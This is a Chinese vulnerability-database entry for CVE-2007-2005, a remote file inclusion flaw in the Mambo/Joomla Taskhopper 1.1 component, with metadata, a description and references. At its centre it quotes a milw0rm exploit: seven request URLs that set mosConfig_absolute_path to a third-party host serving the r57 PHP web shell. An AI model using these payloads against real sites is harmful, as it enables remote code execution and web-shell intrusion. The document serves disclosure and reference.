Mambo/Joomla Taskhopper组件 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112671 漏洞类型 代码注入
发布时间 2007-04-10 更新时间 2007-10-01
CVE编号 CVE-2007-2005 CNNVD-ID CNNVD-200704-216
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3703
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-216
|漏洞详情
Mambo和Joomla!Taskhopper1.1组件中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到inc/中的(1)contact_type.php,(2)itemstatus_type.php,(3)projectstatus_type.php,(4)request_type.php,(5)responses_type.php,(6)timelog_type.php或(7)urgency_type.php文件的mosConfig_absolute_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/  mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]
|参考资料

来源:XF
名称:taskhopper-mosconfigabsolute-file-include(33552)
链接:http://xforce.iss.net/xforce/xfdb/33552
来源:BID
名称:23408
链接:http://www.securityfocus.com/bid/23408
来源:MILW0RM
名称:3703
链接:http://www.milw0rm.com/exploits/3703
来源:VUPEN
名称:ADV-2007-1346
链接:http://www.frsirt.com/english/advisories/2007/1346
来源:OSVDB
名称:34801
链接:http://www.osvdb.org/34801
来源:OSVDB
名称:34800
链接:http://www.osvdb.org/34800
来源:OSVDB
名称:34799
链接:http://www.osvdb.org/34799
来源:OSVDB
名称:34798
链接:http://www.osvdb.org/34798
来源:OSVDB
名称:34797
链接:http://www.osvdb.org/34797
来源:OSVDB
名称:34796
链接:http://www.osvdb.org/34796
来源:OSVDB
名称:34795
链接:http://www.osvdb.org/34795
来源:VIM
名称:20070411Confirm:Joomla/MamboComponentTaskhopper1.1RFIVulnerabilities
链接:http://attrition.org/pipermail/vim/2007-April/001504.html